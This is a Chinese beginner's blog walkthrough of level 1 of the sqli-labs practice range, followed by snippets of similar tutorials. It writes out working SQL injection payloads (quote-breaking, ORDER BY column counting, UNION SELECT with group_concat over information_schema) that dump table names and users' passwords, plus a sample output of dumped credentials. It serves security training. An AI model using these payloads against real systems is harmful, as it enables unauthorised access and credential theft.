sqli-labs一第一关详细步骤,新手打基础篇

最新推荐文章于 2024-06-07 14:19:10 发布
最新推荐文章于 2024-06-07 14:19:10 发布
阅读量571 收藏 1
点赞数 1
文章标签: 编辑器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50956249/article/details/129682275
版权

第一关
要求:请在url上输入一个id、get请求
1、首先判断是字符型还是数字型
输入 1,有用户显示
输入1’,提示语法错误
输入1’–+,有用户显示
说明是字符型注入
2、判断列数
order by 1–+ 往后以此类推,知道显示报错信息为止
在这里插入图片描述
这里order by 4显示错误信息,所以这个表三列

3、联合查询
union select 1,2,3…上一步有多少列就写多少个,查看输出结果,看数据输出在哪几列
这里把id改为了-1,因为这个sql语句应该是用了limit,只显示一条数据,但是我们要判断数据显示在哪一列,所以把id改成-1,这里显示了2,3,说明数据在二三列显示,第一列不显示数据

4、先查出使用的是哪个数据库,用database()函数,以及数据库版本信息,用version()函数
这里如果将函数写在1的位置,是显示不出数据的,这就是为什么需要知道数据显示在哪几列的原因
5、查出数据库名称后,爆破表名,union 1,group_concat(table_name),3,…有多少列写多少列 from infomation_schema.tables where table_schema=‘数据库名’–+
在这里插入图片描述
6、查出该数据库所有的表名后,选一个你想查的表,继续爆破这个表的数据
union 1,2,group_concat(column_name),… from information_schema.columns where table_name=‘表名’–+
这里我查的是users表,但是查出来多了三列,不知道为什么,知道的朋友可以在评论区讨论
7、查出了具体的字段名,最后一步就是查出具体的数据了,union 1,2,group _concat(username,id,password) from users–+
在这里插入图片描述
至此,结束

王小青89
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
sqli-labs第一关
weixin_69147946的博客
11-11 457
sqli-labs靶机笔记
Sqlilabs靶场1-10关详解(Get请求式)
爱吃仡坨的Blog
10-16 2499
sqlilabs用到的是mysql数据库,mysql5.0以上版本自带的数据库是information_schema,其下有tables和columns两个表tables表中的table_name字段下是所有数据库存在的表名table_schema字段下是所有表名对应的数据库名。columns表中的column_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库。
Sql-labs的第一关
最新发布
繁星
06-07 612
Sql注入要求我们对数据库的结构要有一个大概的了解,这要就能更容易去操作!!!
Sqli-libs通关详解__第一关
henghengzhao_的博客
10-04 876
sqli-libs通关详解,第一关通关详解
Sqli-labs靶场笔记1(Less-1 SQL注入基本操作)
m0_52233414的博客
03-31 417
sqli-labs靶场使用的是mysql数据库,所以在打之前,我们要了解一下mysql数据库的结构,mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库。
sqli-labs关卡1(基于get提交的单引号闭合的字符型注入)通关思路
zyh1588的博客
10-20 420
萌新之练习sqli-labs靶场第一关
sqlilabs 1-10关
weixin_48993614的博客
07-11 661
根据提示,第一关是get单引号 第一步,看看页面有没有报错 http://192.168.26.132:86/Less-1/?id=1’ and 1=2–+ 页面直接异常 猜测字段 :http://192.168.26.132:86/Less-1/?id=-1’ order by 3–+ 回显位 :http://192.168.26.132:86/Less-1/?id=-1’ union select 1,2,3–+ 当前用户和数据库 :http://192.168.26.132:86/Less-1/
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs-1
m0_63190830的博客
06-30 201
sqli/less-1基础题
sqlilab第一关
qq_45491497的博客
07-28 1987
1.判断注入方式为字符型 输入正常id=1 注入引号 可以推断查询语句为select * from users where id=1 limit 0,1; (ps:users表只是举例) 打开第一关的php源码查看结果 打开数据库命令行查询结果 2.查询库名 <1>判断表有几列 当输入order by 3时未报错,而order by 4报错,说明表有三列 <2>判断回显的位置 为了union后的语句可生效,需将之前的报错,改为-1 se.
Sqli-labs靶场第1关详解[Sqli-labs-less-1]
m0_73615178的博客
02-19 521
SQL 注入的三个条件: ①参数可控;(从参数输入就知道参数可控) ②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断) ③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4。
Sqli-lab教程-史上最全详解(1-22通关)
qq_52364123的博客
04-10 8899
sql注入集合
sqli-labs 1~4关详解
qq_45756971的博客
10-15 488
点进去题目:提示我们输入题目id,第一题,所以我们输入?id=1,回车即可。如图:首先可以判断这里接受的是一个GET请求,先在1后面加一个’ 发现报错,说明这里没有过滤掉引号,所以这里是一个注入点 SQL注入通常有两种类型,整形注入和字符型注入,那么我们要判断这是哪种注入就要分析这里的报错语句,报错信息中共有5个单引号,"实际上是两个单引号,最外面的两个是报错信息的提示引号,'1’两边的引号是后台代码的引号,多出来的就是我们加上的,因为这里给输入的1加上了引号所以后台接受的是字符型,那么我们在后续的注入中需
sql-lib 1-10关
鸣蜩十四的博客
06-14 653
1. 字符型 http://127.0.0.1:88/sql/Less-1/?id=1' order by 4%23失败 http://127.0.0.1:88/sql/Less-1/?id=1' order by 3%23成功 http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,database(),group_concat(schema_name) from information_schema.schemata%23 查看所有数据库 ht...
sqli-labs第1关
weixin_45626840的博客
04-23 206
草草写的一记录文章 概念 SQL注入就是将恶意代码拼接到业务正常的数据库查询,造成数据库信息泄露等危害。 我觉得 要弄懂SQL注入,需要一点计网的知识,最好知道Web开发的整个流程,中间用了哪些技术,为什么需要这种技术。当然,你首先得懂得数据库以及SQL查询,并且程序设计语言和SQL语言之间的结合(推荐一本书《数据库系统概论》)。有了这些基础,SQL注入就自然而然会懂的。 通关思路 输入id,登录正常 尝试闭合语句 单引号报错,推测后端查询语句为: select * from table where
sqli-labs-master第一关
05-19
sqli-labs-master是一个SQL注入练习平台,第一关是一个基础的SQL注入练习。 首先,打开练习平台,找到第一关的链接。在链接的末尾加上 `'`,观察页面的响应。如果页面存在SQL注入漏洞,那么会显示类似如下的错误信息: ``` You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 ``` 这意味着我们在SQL语句中注入了一个单引号,导致MySQL服务器无法正确解析SQL语句。这也是SQL注入漏洞的典型表现。 接下来,我们可以尝试利用注入漏洞获取数据库中的数据。在第一关中,我们需要获取 `users` 表中的数据。因此,我们可以在链接的末尾加上以下语句: ```sql ' union select 1,2,3,4,5,6,7,8-- ``` 这个语句会在SQL语句中插入一个 `union` 查询语句,用于查询 `users` 表中的数据。`1` 到 `8` 是查询的字段数量,这里可以根据实际情况调整。双破折号 `--` 表示注释,用于避免语法错误。 将以上语句加到链接末尾后,点击访问链接,页面会显示类似以下内容的数据: ``` 1 2 3 4 5 6 7 8 1 admin 5f4dcc3b5aa765d61d8327deb882cf99 1 2 bob 202cb962ac59075b964b07152d234b70 0 ``` 其中,第一行是查询结果的字段名,第二行开始是 `users` 表中的数据。我们可以看到,这个表中包含了两个用户的信息,其中 `admin` 用户的密码经过了 MD5 加密。 这样,我们就成功地利用 SQL 注入漏洞获取了数据库中的数据,完成了第一关的挑战。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值